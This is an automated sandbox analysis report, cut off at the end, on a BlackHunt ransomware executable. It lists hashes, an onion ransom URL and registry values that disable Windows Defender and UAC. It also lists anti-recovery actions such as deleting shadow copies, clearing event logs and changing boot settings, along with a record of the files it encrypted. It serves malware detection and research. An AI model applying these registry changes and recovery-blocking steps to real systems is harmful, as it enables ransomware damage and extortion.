Analysis
-
max time kernel
91s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:12
Static task
static1
Behavioral task
behavioral1
Sample
5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe
Resource
win10v2004-20231215-en
General
-
Target
5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe
-
Size
707KB
-
MD5
ef9c4a6d39df57ae07f4b63b4d73f3de
-
SHA1
67a1ffeb33ddde0c1d7a7e2d16814350bcc77472
-
SHA256
5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3
-
SHA512
09b677b968207130aa1a67f2fe21662bcb07eea82fc1f134da5329bc69727154b12759487e7b28c24275ec3d05064d7f41a2637bcb9db9258d5a8e93f56f0a2b
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1l81vnh:6uaTmkZJ+naie5OTamgEoKxLW4xh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 13952 fsutil.exe 8536 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 7560 wevtutil.exe 11028 wevtutil.exe 10380 wevtutil.exe 8432 wevtutil.exe 13572 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 8732 bcdedit.exe 8620 bcdedit.exe 13740 bcdedit.exe 12200 bcdedit.exe -
Renames multiple (3340) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 8584 wbadmin.exe 13336 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\J: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\S: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\H: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\K: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\W: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\P: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\G: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\B: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\A: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\L: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\Q: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\E: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\Y: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\V: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\R: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\I: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\Z: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\T: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\O: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\M: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\X: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\N: 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened (read-only) \??\F: vssadmin.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\es-es\PlayStore_icon.svg 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jvm.lib 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\nl-nl\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\main-selector.css 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\libxml2.md 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected.svg 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\eu-es\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\ui-strings.js 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\ui-strings.js 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-cn_get.svg 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files\7-Zip\readme.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\da-dk\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Google\Update\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\libs\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons_2x.png 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\help.svg 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\he-il\ui-strings.js 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files\RestartLock.vssm 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\ui-strings.js 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ja-jp\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\it-it\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pt-br\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-4x.png 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ro-ro\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fi-fi\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\he-il\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\ui-strings.js 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\ui-strings.js 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\#BlackHunt_Private.key 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-il\#BlackHunt_ReadMe.txt 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\#BlackHunt_ReadMe.hta 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 16172 6468 WerFault.exe 291 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7344 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 11996 vssadmin.exe 11352 vssadmin.exe 4664 vssadmin.exe 4216 vssadmin.exe 3552 vssadmin.exe 13652 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 13244 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5312 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Token: SeRestorePrivilege 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Token: SeBackupPrivilege 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Token: SeTakeOwnershipPrivilege 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Token: SeAuditPrivilege 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Token: SeSecurityPrivilege 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Token: SeIncBasePriorityPrivilege 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe Token: SeBackupPrivilege 6912 vssvc.exe Token: SeRestorePrivilege 6912 vssvc.exe Token: SeAuditPrivilege 6912 vssvc.exe Token: SeBackupPrivilege 30116 wbengine.exe Token: SeRestorePrivilege 30116 wbengine.exe Token: SeSecurityPrivilege 30116 wbengine.exe Token: SeSecurityPrivilege 7560 wevtutil.exe Token: SeBackupPrivilege 7560 wevtutil.exe Token: SeSecurityPrivilege 11028 wevtutil.exe Token: SeBackupPrivilege 11028 wevtutil.exe Token: SeSecurityPrivilege 10380 wevtutil.exe Token: SeBackupPrivilege 10380 wevtutil.exe Token: SeSecurityPrivilege 8432 wevtutil.exe Token: SeBackupPrivilege 8432 wevtutil.exe Token: SeSecurityPrivilege 13572 wevtutil.exe Token: SeBackupPrivilege 13572 wevtutil.exe Token: SeDebugPrivilege 13244 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2924 wrote to memory of 4908 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 90 PID 2924 wrote to memory of 4908 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 90 PID 2924 wrote to memory of 852 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 101 PID 2924 wrote to memory of 852 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 101 PID 2924 wrote to memory of 1940 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 96 PID 2924 wrote to memory of 1940 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 96 PID 2924 wrote to memory of 3644 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 91 PID 2924 wrote to memory of 3644 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 91 PID 2924 wrote to memory of 3544 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 93 PID 2924 wrote to memory of 3544 2924 5c91b6a4ac2261f10a4a8bf53b01bc469f394de4ca17b6a2fb6169c4ef9670b3.exe 93 PID 2924 wrote to memory of 2304 2924 